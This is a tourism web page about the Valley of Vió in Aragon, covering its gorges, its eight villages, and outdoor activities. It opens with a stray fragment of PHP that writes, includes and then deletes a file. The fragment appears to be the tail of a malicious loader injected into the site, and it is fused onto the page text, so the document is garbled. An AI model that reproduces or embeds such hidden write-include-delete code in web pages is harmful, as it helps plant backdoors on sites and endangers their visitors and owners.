");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Valley of Vió

Areas and Valleys

Valley of Vió

Valle Vió lies between canyons and gorges, a territory where most of its municipality is part of the National Park. The gorges of Añisclo, Aso, Yesa and Gloces make up the physiognomy of this valley, together with small villages located on its sunny slopes.

Fanlo, Yeba, Vió, Buerba, Nerín, Buisán, Ceresuela and Sercué are the eight villages that comprise Valle Vió, all of them featuring beautiful examples of traditional and popular architecture that are worth a visit.

This Valley offers hundreds of possible activities such as canyoning (Gloces, Yesa, Aso), caving (Aso, Manatuero...), hiking, birdwatching or guided tours by bus departing from Nerín towards the viewpoints of Ordesa.